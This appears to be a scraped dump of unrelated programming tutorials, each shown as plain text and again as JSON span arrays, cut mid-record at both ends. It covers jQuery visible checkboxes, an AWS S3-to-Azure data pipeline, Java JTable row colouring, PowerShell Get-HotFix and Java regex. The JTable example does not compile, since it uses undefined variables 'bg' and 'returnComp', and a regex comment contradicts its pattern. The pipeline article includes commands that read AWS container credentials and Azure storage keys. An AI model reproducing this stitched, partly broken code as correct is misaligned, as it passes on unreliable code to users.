31646, "s": 31548, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31664, "s": 31646, "text": "Python Dictionary" }, { "code": null, "e": 31686, "s": 31664, "text": "Enumerate() in Python" }, { "code": null, "e": 31718, "s": 31686, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 31760, "s": 31718, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 31786, "s": 31760, "text": "Python String | replace()" }, { "code": null, "e": 31808, "s": 31786, "text": "Defaultdict in Python" }, { "code": null, "e": 31854, "s": 31808, "text": "Python | Split string into list of characters" }, { "code": null, "e": 31893, "s": 31854, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 31931, "s": 31893, "text": "Python | Convert a list to dictionary" } ]
How to get value from the first checkbox which is not hidden in jQuery?
To get value from the first checkbox, which is not hidden, use the :visible selector. Following is the code − Live Demo <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initialscale=1.0"> <title>>Document</title> <link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css"> <style> .notShown { display: none; } </style> <script src="https://code.jquery.com/jquery-1.12.4.js"></script> <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script> </head> <body> <div class='form'> <input class="demo notShown" type="checkbox" value="first" checked="checked" /> <br /> <input class="demo" type="checkbox" value="second" checked="checked"/> <br /> <input class="demo" type="checkbox" value="third" /> <br /> <input class="demo " type="checkbox" value="fourth" checked="checked" /> </div> <script> var v=$('input:checkbox:checked:visible:first').val(); console.log(v); </script> </body> </html> To run the above program, save the file name “anyName.html(index.html)” and right click on the file. Select the option “Open with Live Server” in VS Code editor. This will produce the following output displaying the visible value “second” in console −
[ { "code": null, "e": 1172, "s": 1062, "text": "To get value from the first checkbox, which is not hidden, use the :visible selector. Following is the code −" }, { "code": null, "e": 1183, "s": 1172, "text": " Live Demo" }, { "code": null, "e": 2068, "s": 1183, "text": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n<meta charset=\"UTF-8\">\n<meta name=\"viewport\" content=\"width=device-width, initialscale=1.0\">\n<title>>Document</title>\n<link rel=\"stylesheet\"\nhref=\"//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css\">\n<style>\n .notShown {\n display: none;\n}\n</style>\n<script src=\"https://code.jquery.com/jquery-1.12.4.js\"></script>\n<script src=\"https://code.jquery.com/ui/1.12.1/jquery-ui.js\"></script>\n</head>\n<body>\n<div class='form'>\n<input class=\"demo notShown\" type=\"checkbox\" value=\"first\"\nchecked=\"checked\" />\n<br />\n<input class=\"demo\" type=\"checkbox\" value=\"second\"\nchecked=\"checked\"/>\n<br />\n<input class=\"demo\" type=\"checkbox\" value=\"third\" />\n<br />\n<input class=\"demo \" type=\"checkbox\" value=\"fourth\"\nchecked=\"checked\" />\n</div>\n<script>\n var v=$('input:checkbox:checked:visible:first').val();\n console.log(v);\n</script>\n</body>\n</html>" }, { "code": null, "e": 2230, "s": 2068, "text": "To run the above program, save the file name “anyName.html(index.html)” and right click on the file. Select the option “Open with Live Server” in VS Code editor." }, { "code": null, "e": 2320, "s": 2230, "text": "This will produce the following output displaying the visible value “second” in console −" } ]
Building an Event-Driven Data Pipeline to Copy Data from Amazon S3 to Azure Storage | by Yi Ai | Towards Data Science
It may be a requirement of your business to move a good amount of data periodically from one public cloud to another. More specifically, you may face mandates requiring a multi-cloud solution. This article covers one approach to automate data replication from AWS S3 Bucket to Microsoft Azure Blob Storage container using Amazon S3 Inventory, Amazon S3 Batch Operations, Fargate, and AzCopy. Your company produces new CSV files on-premises every day with a total size of around 100GB after compression. All files have a size of 1–2 GB and need to be uploaded to Amazon S3 every night in a fixed time window between 3 am, and 5 am. Your business has decided to copy those CSV files from S3 to Microsoft Azure Storage after all files uploaded to S3. You have to find an easy and fast way to automate the data replication workflow. To accomplish this task, we can build a data pipeline to copy data periodically from S3 to Azure Storage using AWS Data Wrangler, Amazon S3 Inventory, Amazon S3 Batch Operations, Athena, Fargate, and AzCopy. The diagram below represents the high-level architecture of the pipeline solution: Create a VPC with private and public subnets, S3 endpoints, and NAT gateway. Create an Azure Storage account and blob container, generate a SAS token, then add a firewall rule to allow traffic from AWS VPC to Azure Storage. Configure daily S3 Inventory Reports on the S3 bucket. Use Athena to filter only the new objects from S3 inventory reports and export those objects’ bucket names & object keys to a CSV manifest file. Use exported CSV manifest file to create an S3 Batch Operations PUT copy Job that copies objects to a destination S3 bucket with lifecycle policy expiration rule configured. Setup an Eventbridge rule, invoke lambda function to run Fargate task that copies all objects with the same prefix in destination bucket to Azure Storage container. Setup an AWS account Setup an Azure account Install the latest AWS-CLI Install AWS CDK-CLI Basic understanding of AWS CDK Basic understanding of Docker We use CDK to build our infrastructure on AWS. First, let’s create a source Bucket to receive files from external providers or on-premise and set up daily inventory reports that provide a flat-file list of your objects and metadata. Next, create a destination bucket as temporary storage with lifecycle policy expiration rule configured on prefix /tmp_transition. All files with the prefix (eg. /tmp_transition/file1.csv) will copy to Azure and will be removed by lifecycle policy after 24hours. Use the following code to create S3 buckets. Next, we need to create VPC with both public and private subnets, NAT Gateway, an S3 endpoint, and attach an endpoint policy that allows access to the Fargate container to which S3 bucket we are copying data to Azure. Now define your VPC and related resources using the following code. While creating NAT Gateway, an Elastic IP Address will create in AWS. We will need the IP address to set up the Azure Storage Firewall rule in step3. To simplify managing resources, we can use the Azure Resource Manager template (ARM template) to deploy resources at our Azure subscription level. I will assume you already have an Azure Subscription setup. We will use Cloud shell to deploy a Resource Group, Azure Storage account, a container, and Firewall rule to allow traffic from a specific IP address. Click on the Cloud Shell icon in the Azure Portal's header bar, and it will open the Cloud Shell. Run the following command to deploy: az group create --name examplegroup --location australiaeastaz deployment group create --resource-group examplegroup --template-uri https://raw.githubusercontent.com/yai333/DataPipelineS32Blob/master/Azure-Template-DemoRG/template.json --parameters storageAccounts_mydemostroageaccount_name=mydemostorageaccountaiyi --debug Once the template has been deployed, we can verify the deployment by exploring the Azure portal's resource group. All resources deployed will be displayed in the Overview section of the Resource group. Let’s create a Firewall rule for our Storage Account: Firstly, go to the storage account we just deployed. Secondly, click on the settings menu called Firewalls and virtual networks. Thirdly, check that you’ve selected to allow access from Selected networks. Then, for granting access to an internet IP range, enter AWS VPC’s public IP address (step 2) and Save. We will then generate Shared Access Signatures (SAS) to grant limited access to Azure Storage resources. Run below command in Cloudshell: RG_NAME='examplegroup'ACCOUNT_NAME='mydemostorageaccountaiyi' ACCOUNT_KEY=`az storage account keys list --account-name=$ACCOUNT_NAME --query [0].value -o tsv`BLOB_CONTAINER=democontainerSTORAGE_CONN_STRING=`az storage account show-connection-string --name $ACCOUNT_NAME --resource-group $RG_NAME --output tsv`SAS=`az storage container generate-sas --connection-string $STORAGE_CONN_STRING -n $BLOB_CONTAINER --expiry '2021-06-30' --permissions aclrw --output tsv`echo $SAS We will get the required SAS and URLs that grant (a)dd (d)elete (r)ead (w)rite access to a blob container democontainer. se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D Let’s move back to AWS and put SAS to AWS SSM Parameter Store. Run following command in local terminator. aws ssm put-parameter --cli-input-json '{ "Name": "/s3toblob/azure/storage/sas", "Value": "se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D", "Type": "SecureString"}' Now, let’s move up to lambda functions. We will create three lambda functions and one lambda layer: fn_create_s3batch_manifest and DataWranglerLayer fn_create_batch_job fn_process_transfer_task This lambda function uses AWS Data Wrangler’s Athena module to filter new files in the past UTC date and save files list to a CSV manifest file. Copy the following code to CDK stack.py. download awswranger-layerzip file from here. then create ./src/lambda_create_s3batch_manifest.py with the following code: In the above coding, we use Athena query to create Glue Database, Table and add a partition to that table every day. Then lambda executes except query to return the difference between the two date partitions. Note that start_query_execution is asynchronous, hence no need to wait for the result in Lambda. Once the query is executed, the result will save to s3_output=f"s3://{os.getenv('DESTINATION_BUCKET_NAME')}/csv_manifest/dt={partition_dt}" as a CSV file. In this section, we will create a lambda function fn_create_batch_job and enable Amazon S3 to send a notification to trigger fn_create_batch_job when a CSV file is added to an Amazon S3 Bucket /csv_manifest prefix. Put following code to CDK stack.py: Create ./src/lambda_create_batch_job.py with the following code: Lambda fn_create_batch_job function create S3 Batch Operation Job, copy all the files listed in CSV manifest to S3 Destination Bucket /tmp_transition prefix . S3 Batch Operations is an Amazon S3 data management feature that lets you manage billions of objects at scale. To start an S3 Batch Operation Job, we also need to set up an IAM role S3BatchRole with the corresponding policies: We will create an Eventbridge custom rule that tracks an S3 Batch Operations job in Amazon EventBridge through AWS CloudTrail and send events in Completed status to the target notification resource fn_process_transfer_task . Lambda fn_process_transfer_task will then start a Fargate Task programmatically to copy files in /tmp_transition prefix to Azure Storage Container democontainer . Create ./src/lambda_process_s3transfer_task.py with the following code: Now, We have set up the Serverless part. Let’s move up to the Fargate task and process the data replication. We will create: An ECR image with AzCopy was installed. AzCopy is a command-line utility that you can use to copy blobs or files to or from a storage account. An ECS Cluster with a Fargte task. Let’s getting started. Build ECS, ECR, and Fargate stack. Build ECS, ECR, and Fargate stack. 2. Build a Docker image and install Azcopy there. Note that to use AzCopy transfer files from AWS, we will need to set up AWS Credentials in the container. We can retrieve AWS credentials using: curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI 3. Push Docker image to ECR eval $(aws ecr get-login --region ap-southeast-2 --no-include-email)docker build . -t YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAMEdocker push YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAME Great! We have what we need! You can find the full solution CDK project in my Github Repo. Clone the repo and deploy the stack: cd CDK-S3toblob pip install -r requirements.txtcdk deploy Once the stack has been successfully created, navigate to the AWS CloudFormation console, locate the stack we just created, and go to the Resources tab to find the deployed resources. Now it’s time to test our workflow; go to the S3 source bucket demo-databucket-source . Upload as many files in different folders (prefix). Wait 24 hours for the next inventory report generated; then, you will see the whole pipeline start running, and files will eventually be copied to Azure democontainer . We should see the logs of the Fargate task like the below screenshot. We can also monitor, troubleshoot, and set alarms for ECS resources using CloudWatch Container Insights. In this article, I introduced the approach to automate data replication from AWS S3 to Microsoft Azure Storage. I walked you through how to use CDK to deploy VPC, AWS S3, Lambda, Cloudtrail, Fargte resources, showing you how to use the ARM template deploy Azure services. I showed you how to use the AWS Wrangler library and Athena query to create a table and querying the table. I hope you have found this article useful. You can find the complete project in my GitHub repo.
[ { "code": null, "e": 564, "s": 172, "text": "It may be a requirement of your business to move a good amount of data periodically from one public cloud to another. More specifically, you may face mandates requiring a multi-cloud solution. This article covers one approach to automate data replication from AWS S3 Bucket to Microsoft Azure Blob Storage container using Amazon S3 Inventory, Amazon S3 Batch Operations, Fargate, and AzCopy." }, { "code": null, "e": 1001, "s": 564, "text": "Your company produces new CSV files on-premises every day with a total size of around 100GB after compression. All files have a size of 1–2 GB and need to be uploaded to Amazon S3 every night in a fixed time window between 3 am, and 5 am. Your business has decided to copy those CSV files from S3 to Microsoft Azure Storage after all files uploaded to S3. You have to find an easy and fast way to automate the data replication workflow." }, { "code": null, "e": 1209, "s": 1001, "text": "To accomplish this task, we can build a data pipeline to copy data periodically from S3 to Azure Storage using AWS Data Wrangler, Amazon S3 Inventory, Amazon S3 Batch Operations, Athena, Fargate, and AzCopy." }, { "code": null, "e": 1292, "s": 1209, "text": "The diagram below represents the high-level architecture of the pipeline solution:" }, { "code": null, "e": 1369, "s": 1292, "text": "Create a VPC with private and public subnets, S3 endpoints, and NAT gateway." }, { "code": null, "e": 1516, "s": 1369, "text": "Create an Azure Storage account and blob container, generate a SAS token, then add a firewall rule to allow traffic from AWS VPC to Azure Storage." }, { "code": null, "e": 1571, "s": 1516, "text": "Configure daily S3 Inventory Reports on the S3 bucket." }, { "code": null, "e": 1716, "s": 1571, "text": "Use Athena to filter only the new objects from S3 inventory reports and export those objects’ bucket names & object keys to a CSV manifest file." }, { "code": null, "e": 1890, "s": 1716, "text": "Use exported CSV manifest file to create an S3 Batch Operations PUT copy Job that copies objects to a destination S3 bucket with lifecycle policy expiration rule configured." }, { "code": null, "e": 2055, "s": 1890, "text": "Setup an Eventbridge rule, invoke lambda function to run Fargate task that copies all objects with the same prefix in destination bucket to Azure Storage container." }, { "code": null, "e": 2076, "s": 2055, "text": "Setup an AWS account" }, { "code": null, "e": 2099, "s": 2076, "text": "Setup an Azure account" }, { "code": null, "e": 2126, "s": 2099, "text": "Install the latest AWS-CLI" }, { "code": null, "e": 2146, "s": 2126, "text": "Install AWS CDK-CLI" }, { "code": null, "e": 2177, "s": 2146, "text": "Basic understanding of AWS CDK" }, { "code": null, "e": 2207, "s": 2177, "text": "Basic understanding of Docker" }, { "code": null, "e": 2440, "s": 2207, "text": "We use CDK to build our infrastructure on AWS. First, let’s create a source Bucket to receive files from external providers or on-premise and set up daily inventory reports that provide a flat-file list of your objects and metadata." }, { "code": null, "e": 2703, "s": 2440, "text": "Next, create a destination bucket as temporary storage with lifecycle policy expiration rule configured on prefix /tmp_transition. All files with the prefix (eg. /tmp_transition/file1.csv) will copy to Azure and will be removed by lifecycle policy after 24hours." }, { "code": null, "e": 2748, "s": 2703, "text": "Use the following code to create S3 buckets." }, { "code": null, "e": 2966, "s": 2748, "text": "Next, we need to create VPC with both public and private subnets, NAT Gateway, an S3 endpoint, and attach an endpoint policy that allows access to the Fargate container to which S3 bucket we are copying data to Azure." }, { "code": null, "e": 3034, "s": 2966, "text": "Now define your VPC and related resources using the following code." }, { "code": null, "e": 3184, "s": 3034, "text": "While creating NAT Gateway, an Elastic IP Address will create in AWS. We will need the IP address to set up the Azure Storage Firewall rule in step3." }, { "code": null, "e": 3331, "s": 3184, "text": "To simplify managing resources, we can use the Azure Resource Manager template (ARM template) to deploy resources at our Azure subscription level." }, { "code": null, "e": 3542, "s": 3331, "text": "I will assume you already have an Azure Subscription setup. We will use Cloud shell to deploy a Resource Group, Azure Storage account, a container, and Firewall rule to allow traffic from a specific IP address." }, { "code": null, "e": 3640, "s": 3542, "text": "Click on the Cloud Shell icon in the Azure Portal's header bar, and it will open the Cloud Shell." }, { "code": null, "e": 3677, "s": 3640, "text": "Run the following command to deploy:" }, { "code": null, "e": 4002, "s": 3677, "text": "az group create --name examplegroup --location australiaeastaz deployment group create --resource-group examplegroup --template-uri https://raw.githubusercontent.com/yai333/DataPipelineS32Blob/master/Azure-Template-DemoRG/template.json --parameters storageAccounts_mydemostroageaccount_name=mydemostorageaccountaiyi --debug" }, { "code": null, "e": 4204, "s": 4002, "text": "Once the template has been deployed, we can verify the deployment by exploring the Azure portal's resource group. All resources deployed will be displayed in the Overview section of the Resource group." }, { "code": null, "e": 4258, "s": 4204, "text": "Let’s create a Firewall rule for our Storage Account:" }, { "code": null, "e": 4311, "s": 4258, "text": "Firstly, go to the storage account we just deployed." }, { "code": null, "e": 4387, "s": 4311, "text": "Secondly, click on the settings menu called Firewalls and virtual networks." }, { "code": null, "e": 4463, "s": 4387, "text": "Thirdly, check that you’ve selected to allow access from Selected networks." }, { "code": null, "e": 4567, "s": 4463, "text": "Then, for granting access to an internet IP range, enter AWS VPC’s public IP address (step 2) and Save." }, { "code": null, "e": 4672, "s": 4567, "text": "We will then generate Shared Access Signatures (SAS) to grant limited access to Azure Storage resources." }, { "code": null, "e": 4705, "s": 4672, "text": "Run below command in Cloudshell:" }, { "code": null, "e": 5178, "s": 4705, "text": "RG_NAME='examplegroup'ACCOUNT_NAME='mydemostorageaccountaiyi' ACCOUNT_KEY=`az storage account keys list --account-name=$ACCOUNT_NAME --query [0].value -o tsv`BLOB_CONTAINER=democontainerSTORAGE_CONN_STRING=`az storage account show-connection-string --name $ACCOUNT_NAME --resource-group $RG_NAME --output tsv`SAS=`az storage container generate-sas --connection-string $STORAGE_CONN_STRING -n $BLOB_CONTAINER --expiry '2021-06-30' --permissions aclrw --output tsv`echo $SAS" }, { "code": null, "e": 5299, "s": 5178, "text": "We will get the required SAS and URLs that grant (a)dd (d)elete (r)ead (w)rite access to a blob container democontainer." }, { "code": null, "e": 5392, "s": 5299, "text": "se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D" }, { "code": null, "e": 5455, "s": 5392, "text": "Let’s move back to AWS and put SAS to AWS SSM Parameter Store." }, { "code": null, "e": 5498, "s": 5455, "text": "Run following command in local terminator." }, { "code": null, "e": 5712, "s": 5498, "text": "aws ssm put-parameter --cli-input-json '{ \"Name\": \"/s3toblob/azure/storage/sas\", \"Value\": \"se=2021-06-30&sp=racwl&sv=2018-11-09&sr=c&sig=xxxxbBfqfEppPpBZPOTRiwvkh69xxxx/xxxxQA0YtKo%3D\", \"Type\": \"SecureString\"}'" }, { "code": null, "e": 5812, "s": 5712, "text": "Now, let’s move up to lambda functions. We will create three lambda functions and one lambda layer:" }, { "code": null, "e": 5861, "s": 5812, "text": "fn_create_s3batch_manifest and DataWranglerLayer" }, { "code": null, "e": 5881, "s": 5861, "text": "fn_create_batch_job" }, { "code": null, "e": 5906, "s": 5881, "text": "fn_process_transfer_task" }, { "code": null, "e": 6051, "s": 5906, "text": "This lambda function uses AWS Data Wrangler’s Athena module to filter new files in the past UTC date and save files list to a CSV manifest file." }, { "code": null, "e": 6137, "s": 6051, "text": "Copy the following code to CDK stack.py. download awswranger-layerzip file from here." }, { "code": null, "e": 6214, "s": 6137, "text": "then create ./src/lambda_create_s3batch_manifest.py with the following code:" }, { "code": null, "e": 6423, "s": 6214, "text": "In the above coding, we use Athena query to create Glue Database, Table and add a partition to that table every day. Then lambda executes except query to return the difference between the two date partitions." }, { "code": null, "e": 6675, "s": 6423, "text": "Note that start_query_execution is asynchronous, hence no need to wait for the result in Lambda. Once the query is executed, the result will save to s3_output=f\"s3://{os.getenv('DESTINATION_BUCKET_NAME')}/csv_manifest/dt={partition_dt}\" as a CSV file." }, { "code": null, "e": 6926, "s": 6675, "text": "In this section, we will create a lambda function fn_create_batch_job and enable Amazon S3 to send a notification to trigger fn_create_batch_job when a CSV file is added to an Amazon S3 Bucket /csv_manifest prefix. Put following code to CDK stack.py:" }, { "code": null, "e": 6991, "s": 6926, "text": "Create ./src/lambda_create_batch_job.py with the following code:" }, { "code": null, "e": 7150, "s": 6991, "text": "Lambda fn_create_batch_job function create S3 Batch Operation Job, copy all the files listed in CSV manifest to S3 Destination Bucket /tmp_transition prefix ." }, { "code": null, "e": 7377, "s": 7150, "text": "S3 Batch Operations is an Amazon S3 data management feature that lets you manage billions of objects at scale. To start an S3 Batch Operation Job, we also need to set up an IAM role S3BatchRole with the corresponding policies:" }, { "code": null, "e": 7602, "s": 7377, "text": "We will create an Eventbridge custom rule that tracks an S3 Batch Operations job in Amazon EventBridge through AWS CloudTrail and send events in Completed status to the target notification resource fn_process_transfer_task ." }, { "code": null, "e": 7765, "s": 7602, "text": "Lambda fn_process_transfer_task will then start a Fargate Task programmatically to copy files in /tmp_transition prefix to Azure Storage Container democontainer ." }, { "code": null, "e": 7837, "s": 7765, "text": "Create ./src/lambda_process_s3transfer_task.py with the following code:" }, { "code": null, "e": 7946, "s": 7837, "text": "Now, We have set up the Serverless part. Let’s move up to the Fargate task and process the data replication." }, { "code": null, "e": 7962, "s": 7946, "text": "We will create:" }, { "code": null, "e": 8105, "s": 7962, "text": "An ECR image with AzCopy was installed. AzCopy is a command-line utility that you can use to copy blobs or files to or from a storage account." }, { "code": null, "e": 8140, "s": 8105, "text": "An ECS Cluster with a Fargte task." }, { "code": null, "e": 8163, "s": 8140, "text": "Let’s getting started." }, { "code": null, "e": 8198, "s": 8163, "text": "Build ECS, ECR, and Fargate stack." }, { "code": null, "e": 8233, "s": 8198, "text": "Build ECS, ECR, and Fargate stack." }, { "code": null, "e": 8283, "s": 8233, "text": "2. Build a Docker image and install Azcopy there." }, { "code": null, "e": 8428, "s": 8283, "text": "Note that to use AzCopy transfer files from AWS, we will need to set up AWS Credentials in the container. We can retrieve AWS credentials using:" }, { "code": null, "e": 8494, "s": 8428, "text": "curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" }, { "code": null, "e": 8522, "s": 8494, "text": "3. Push Docker image to ECR" }, { "code": null, "e": 8753, "s": 8522, "text": "eval $(aws ecr get-login --region ap-southeast-2 --no-include-email)docker build . -t YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAMEdocker push YOUR_ACCOUNT_ID.dkr.ecr.ap-southeast-2.amazonaws.com/YOUR_ECR_NAME" }, { "code": null, "e": 8881, "s": 8753, "text": "Great! We have what we need! You can find the full solution CDK project in my Github Repo. Clone the repo and deploy the stack:" }, { "code": null, "e": 8939, "s": 8881, "text": "cd CDK-S3toblob pip install -r requirements.txtcdk deploy" }, { "code": null, "e": 9123, "s": 8939, "text": "Once the stack has been successfully created, navigate to the AWS CloudFormation console, locate the stack we just created, and go to the Resources tab to find the deployed resources." }, { "code": null, "e": 9432, "s": 9123, "text": "Now it’s time to test our workflow; go to the S3 source bucket demo-databucket-source . Upload as many files in different folders (prefix). Wait 24 hours for the next inventory report generated; then, you will see the whole pipeline start running, and files will eventually be copied to Azure democontainer ." }, { "code": null, "e": 9502, "s": 9432, "text": "We should see the logs of the Fargate task like the below screenshot." }, { "code": null, "e": 9607, "s": 9502, "text": "We can also monitor, troubleshoot, and set alarms for ECS resources using CloudWatch Container Insights." }, { "code": null, "e": 9987, "s": 9607, "text": "In this article, I introduced the approach to automate data replication from AWS S3 to Microsoft Azure Storage. I walked you through how to use CDK to deploy VPC, AWS S3, Lambda, Cloudtrail, Fargte resources, showing you how to use the ARM template deploy Azure services. I showed you how to use the AWS Wrangler library and Athena query to create a table and querying the table." } ]
How to set the color to alternate rows of JTable in Java?
A JTable is a subclass of JComponent class and it can be used to create a table with information displayed in multiple rows and columns. When a value is selected from a JTable, a TableModelEvent is generated, which is handled by implementing a TableModelListener interface. We can set the color to alternate rows of JTable by overriding the prepareRenderer() method of JTable class. public Component prepareRenderer(TableCellRenderer renderer, int row, int column) import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.table.*; public class AlternateRowColorTableTest extends JFrame { public AlternateRowColorTableTest() { setTitle("AlternateRowColorTable Test"); JTable table = new JTable(new Object[][] {{"115", "Ramesh"}, {"120", "Adithya"}, {"125", "Jai"}, {"130", "Chaitanya"}, {"135", "Raja"}}, new String[] {"Employee Id", "Employee Name"}) { public Component prepareRenderer(TableCellRenderer renderer, int row, int column) { Component comp = super.prepareRenderer(renderer, row, column); Color alternateColor = new Color(200, 201, 210); Color whiteColor = Color.WHITE; if(!comp.getBackground().equals(getSelectionBackground())) { Color c = (row % 2 == 0 ? alternateColor : whiteColor); comp.setBackground(bg); c = null; } return returnComp; } }; add(new JScrollPane(table)); setSize(400, 300); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setLocationRelativeTo(null); setVisible(true); } public static void main(String[] args) { new AlternateRowColorTableTest(); } }
[ { "code": null, "e": 1336, "s": 1062, "text": "A JTable is a subclass of JComponent class and it can be used to create a table with information displayed in multiple rows and columns. When a value is selected from a JTable, a TableModelEvent is generated, which is handled by implementing a TableModelListener interface." }, { "code": null, "e": 1445, "s": 1336, "text": "We can set the color to alternate rows of JTable by overriding the prepareRenderer() method of JTable class." }, { "code": null, "e": 1527, "s": 1445, "text": "public Component prepareRenderer(TableCellRenderer renderer, int row, int column)" }, { "code": null, "e": 2773, "s": 1527, "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\nimport javax.swing.table.*;\npublic class AlternateRowColorTableTest extends JFrame {\n public AlternateRowColorTableTest() {\n setTitle(\"AlternateRowColorTable Test\");\n JTable table = new JTable(new Object[][] {{\"115\", \"Ramesh\"}, {\"120\", \"Adithya\"}, {\"125\", \"Jai\"}, {\"130\", \"Chaitanya\"}, {\"135\", \"Raja\"}}, new String[] {\"Employee Id\", \"Employee Name\"}) {\n public Component prepareRenderer(TableCellRenderer renderer, int row, int column) {\n Component comp = super.prepareRenderer(renderer, row, column);\n Color alternateColor = new Color(200, 201, 210);\n Color whiteColor = Color.WHITE;\n if(!comp.getBackground().equals(getSelectionBackground())) {\n Color c = (row % 2 == 0 ? alternateColor : whiteColor);\n comp.setBackground(bg);\n c = null;\n }\n return returnComp;\n }\n };\n add(new JScrollPane(table));\n setSize(400, 300);\n setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n setLocationRelativeTo(null);\n setVisible(true);\n }\n public static void main(String[] args) {\n new AlternateRowColorTableTest();\n }\n}" } ]
How to get installed windows update using PowerShell?
To get the installed windows updates using PowerShell, we can use the Get-Hotfix command. This command gets the hotfixes and updates that are installed on the local and the remote computer. This command is the part of Microsoft.Management.PowerShell utility. Get-HotFix PS C:\> Get-HotFix Source Description HotFixID InstalledBy InstalledOn ------ ----------- -------- ----------- ----------- LABMACHINE... Update KB3191565 LABMACHINE2K12\Ad... 1/15/2021 12:00:00 AM LABMACHINE... Update KB2999226 LABMACHINE2K12\Ad... 1/13/2021 12:00:00 AM In the above output, you can see the SourceMachine Name, HotfixID, InstalledBy, and the Installed Date. You can also sort it by the InstalledOn parameter. For example, Get-HotFix | Sort-Object InstalledOn -Descending This command supports the ComputerName parameter which is a string array so we can pass the multiple remote computers to get the installed hotfixes. PS C:\> help Get-HotFix -Parameter ComputerName -ComputerName <System.String[]> Specifies a remote computer. Type the NetBIOS name, an Internet Protocol (IP) address, or a fully qualified domain name (FQDN) of a remote computer. For example, Get-HotFix -ComputerName LabMachine2k12,AD,LabMachine2k16
[ { "code": null, "e": 1252, "s": 1062, "text": "To get the installed windows updates using PowerShell, we can use the Get-Hotfix command. This command gets the hotfixes and updates that are installed on the local and the remote computer." }, { "code": null, "e": 1321, "s": 1252, "text": "This command is the part of Microsoft.Management.PowerShell utility." }, { "code": null, "e": 1332, "s": 1321, "text": "Get-HotFix" }, { "code": null, "e": 1603, "s": 1332, "text": "PS C:\\> Get-HotFix\nSource Description HotFixID InstalledBy InstalledOn\n------ ----------- -------- ----------- -----------\nLABMACHINE... Update KB3191565 LABMACHINE2K12\\Ad... 1/15/2021 12:00:00 AM\nLABMACHINE... Update KB2999226 LABMACHINE2K12\\Ad... 1/13/2021 12:00:00 AM" }, { "code": null, "e": 1707, "s": 1603, "text": "In the above output, you can see the SourceMachine Name, HotfixID, InstalledBy, and the Installed Date." }, { "code": null, "e": 1771, "s": 1707, "text": "You can also sort it by the InstalledOn parameter. For example," }, { "code": null, "e": 1820, "s": 1771, "text": "Get-HotFix | Sort-Object InstalledOn -Descending" }, { "code": null, "e": 1969, "s": 1820, "text": "This command supports the ComputerName parameter which is a string array so we can pass the multiple remote computers to get the installed hotfixes." }, { "code": null, "e": 2198, "s": 1969, "text": "PS C:\\> help Get-HotFix -Parameter ComputerName\n-ComputerName <System.String[]>\nSpecifies a remote computer. Type the NetBIOS name, an Internet Protocol (IP) address, or a fully qualified domain name (FQDN) of a remote computer." }, { "code": null, "e": 2211, "s": 2198, "text": "For example," }, { "code": null, "e": 2269, "s": 2211, "text": "Get-HotFix -ComputerName LabMachine2k12,AD,LabMachine2k16" } ]
How to match non-digits using Java Regular Expression (RegEx)
You can match non-digit character using the meta character "\\D". import java.util.Scanner; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Example { public static void main(String args[]) { //Reading String from user System.out.println("Enter a String"); Scanner sc = new Scanner(System.in); String input = sc.nextLine(); String regex = "\\D"; //Compiling the regular expression Pattern pattern = Pattern.compile(regex); //Retrieving the matcher object Matcher matcher = pattern.matcher(input); int count = 0; while(matcher.find()) { count++; } System.out.println("Number non-digit characters: "+count); } } Enter a String sample text 2425 36 Number non-digit characters: 13 import java.util.Scanner; public class RegexExample { public static void main( String args[] ) { //regular expression to accept 5 letter word String regex = "\\D{10}"; System.out.println("Enter input value: "); Scanner sc = new Scanner(System.in); String input = sc.nextLine(); boolean result = input.matches(regex); if(result) { System.out.println("input matched"); } else { System.out.println("wrong input"); } } } Enter input value: sample abc input matched Enter input value: sample1234 wrong input
[ { "code": null, "e": 1128, "s": 1062, "text": "You can match non-digit character using the meta character \"\\\\D\"." }, { "code": null, "e": 1793, "s": 1128, "text": "import java.util.Scanner;\nimport java.util.regex.Matcher;\nimport java.util.regex.Pattern;\npublic class Example {\n public static void main(String args[]) {\n //Reading String from user\n System.out.println(\"Enter a String\");\n Scanner sc = new Scanner(System.in);\n String input = sc.nextLine();\n String regex = \"\\\\D\";\n //Compiling the regular expression\n Pattern pattern = Pattern.compile(regex);\n //Retrieving the matcher object\n Matcher matcher = pattern.matcher(input);\n int count = 0;\n while(matcher.find()) {\n count++;\n }\n System.out.println(\"Number non-digit characters: \"+count);\n }\n}" }, { "code": null, "e": 1860, "s": 1793, "text": "Enter a String\nsample text 2425 36\nNumber non-digit characters: 13" }, { "code": null, "e": 2361, "s": 1860, "text": "import java.util.Scanner;\npublic class RegexExample {\n public static void main( String args[] ) {\n //regular expression to accept 5 letter word\n String regex = \"\\\\D{10}\";\n System.out.println(\"Enter input value: \");\n Scanner sc = new Scanner(System.in);\n String input = sc.nextLine();\n boolean result = input.matches(regex);\n if(result) {\n System.out.println(\"input matched\");\n }\n else {\n System.out.println(\"wrong input\");\n }\n }\n}" }, { "code": null, "e": 2405, "s": 2361, "text": "Enter input value:\nsample abc\ninput matched" }, { "code": null, "e": 2447, "s": 2405, "text": 